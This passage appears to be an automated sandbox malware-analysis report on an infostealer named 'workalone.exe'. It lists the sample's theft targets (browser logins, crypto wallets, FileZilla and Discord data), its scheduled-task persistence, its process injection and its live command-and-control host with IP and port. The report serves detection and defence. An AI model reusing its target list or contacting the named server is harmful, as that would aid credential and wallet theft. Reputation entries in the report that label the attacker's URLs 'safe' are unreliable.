                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\workalone.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: workalone.exe, 00000001.00000003.372984422.0000000006925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: #l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\workalone.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: Yara matchFile source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.0.workalone.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a29170.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.workalone.exe.3a11340.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: workalone.exe PID: 5956, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    1
                    Valid Accounts
                    221
                    Windows Management Instrumentation
                    1
                    Valid Accounts
                    1
                    Valid Accounts
                    11
                    Masquerading
                    1
                    OS Credential Dumping
                    231
                    Security Software Discovery
                    Remote Services11
                    Archive Collected Data
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    1
                    Access Token Manipulation
                    1
                    Valid Accounts
                    LSASS Memory11
                    Process Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth11
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)111
                    Process Injection
                    1
                    Access Token Manipulation
                    Security Account Manager231
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)1
                    Scheduled Task/Job
                    1
                    Disable or Modify Tools
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer22
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script231
                    Virtualization/Sandbox Evasion
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common111
                    Process Injection
                    Cached Domain Credentials123
                    System Information Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Deobfuscate/Decode Files or Information
                    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                    Obfuscated Files or Information
                    Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)2
                    Software Packing
                    /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 756291 Sample: workalone.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for dropped file 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 9 other signatures 2->48 7 workalone.exe 4 2->7         started        process3 file4 36 C:\Users\user\AppData\...\workalone.exe.log, ASCII 7->36 dropped 50 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->50 52 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 7->52 54 Injects a PE file into a foreign processes 7->54 11 workalone.exe 15 31 7->11         started        15 cmd.exe 2 7->15         started        17 cmd.exe 3 7->17         started        20 cmd.exe 1 7->20         started        signatures5 process6 dnsIp7 38 saleshor12.duckdns.org 85.208.136.178, 46539, 49685, 49687 CMCSUS Germany 11->38 40 api.ip.sb 11->40 56 Tries to harvest and steal browser information (history, passwords, etc) 11->56 58 Tries to steal Crypto Currency Wallets 11->58 22 conhost.exe 11->22         started        60 Uses schtasks.exe or at.exe to add and modify task schedules 15->60 62 Drops PE files with benign system names 15->62 24 conhost.exe 15->24         started        32 C:\Users\user\AppData\Roaming\...\svchost.exe, PE32 17->32 dropped 34 C:\Users\user\...\svchost.exe:Zone.Identifier, ASCII 17->34 dropped 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 schtasks.exe 1 20->30         started        file8 signatures9 process10

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    workalone.exe100%AviraHEUR/AGEN.1235903
                    workalone.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe100%AviraHEUR/AGEN.1235903
                    C:\Users\user\AppData\Roaming\svchost\svchost.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLinkDownload
                    0.0.workalone.exe.590000.0.unpack100%AviraHEUR/AGEN.1235903Download File
                    1.0.workalone.exe.400000.0.unpack100%AviraHEUR/AGEN.1234943Download File
                    SourceDetectionScannerLabelLink
                    api.ip.sb2%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://ns.adobe.cobj0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                    http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                    http://tempuri.org/t_0%URL Reputationsafe
                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                    http://ns.adobe.c/g0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                    http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                    http://saleshor12.duckdns.org:465390%Avira URL Cloudsafe
                    http://saleshor12.duckdns.org:46539/0%Avira URL Cloudsafe
                    saleshor12.duckdns.org:465390%Avira URL Cloudsafe
                    http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                    http://saleshor12.duckdns.org0%Avira URL Cloudsafe
                    https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                    http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                    http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                    http://tempuri.org/00%URL Reputationsafe
                    http://ns.ado/10%URL Reputationsafe
                    http://saleshor12.duckdns.org:0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    saleshor12.duckdns.org
                    85.208.136.178
                    truetrue
                      unknown
                      api.ip.sb
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://saleshor12.duckdns.org:46539/true
                      • Avira URL Cloud: safe
                      unknown
                      saleshor12.duckdns.org:46539true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/chrome_newtabworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                          high
                          https://duckduckgo.com/ac/?q=tmp1B56.tmp.1.drfalse
                            high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                              high
                              http://ns.adobe.cobjworkalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Endpoint/CheckConnectResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.datacontract.org/2004/07/workalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Endpoint/EnvironmentSettingsworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/t_workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%workalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/soap/envelope/workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://saleshor12.duckdns.org:46539workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://search.yahoo.com?fr=crmas_sfpfworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                    high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp1B56.tmp.1.drfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/envelope/Dworkalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://saleshor12.duckdns.orgworkalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://tempuri.org/workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Endpoint/CheckConnectworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                          high
                                          http://ns.adobe.c/gworkalone.exe, 00000001.00000003.385517483.0000000008C81000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404595530.0000000008C91000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.404434533.0000000008C90000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Endpoint/VerifyUpdateResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Endpoint/SetEnvironworkalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=workalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                            high
                                            http://tempuri.org/Endpoint/SetEnvironmentworkalone.exe, 00000001.00000002.407484196.000000000318C000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://tempuri.org/Endpoint/SetEnvironmentResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://tempuri.org/Endpoint/GetUpdatesworkalone.exe, 00000001.00000002.406918576.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://ac.ecosia.org/autocomplete?q=tmp1B56.tmp.1.drfalse
                                              high
                                              https://search.yahoo.com?fr=crmas_sfpworkalone.exe, 00000001.00000002.412835943.000000000432F000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000003.372893673.000000000695E000.00000004.00000800.00020000.00000000.sdmp, tmp10B8.tmp.1.dr, tmpE08F.tmp.1.dr, tmp4D74.tmp.1.dr, tmp10E8.tmp.1.dr, tmp6FE4.tmp.1.dr, tmp4075.tmp.1.dr, tmpAFBA.tmp.1.dr, tmp4D35.tmp.1.dr, tmp7EB6.tmp.1.dr, tmp6FB4.tmp.1.dr, tmpE939.tmp.1.dr, tmp1B56.tmp.1.drfalse
                                                high
                                                https://api.ipify.orgcookies//settinString.Removegworkalone.exe, 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, workalone.exe, 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2004/08/addressingworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Endpoint/GetUpdatesResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/Endpoint/EnvironmentSettingsResponseworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/Endpoint/VerifyUpdateworkalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/0workalone.exe, 00000001.00000002.406453954.0000000003051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
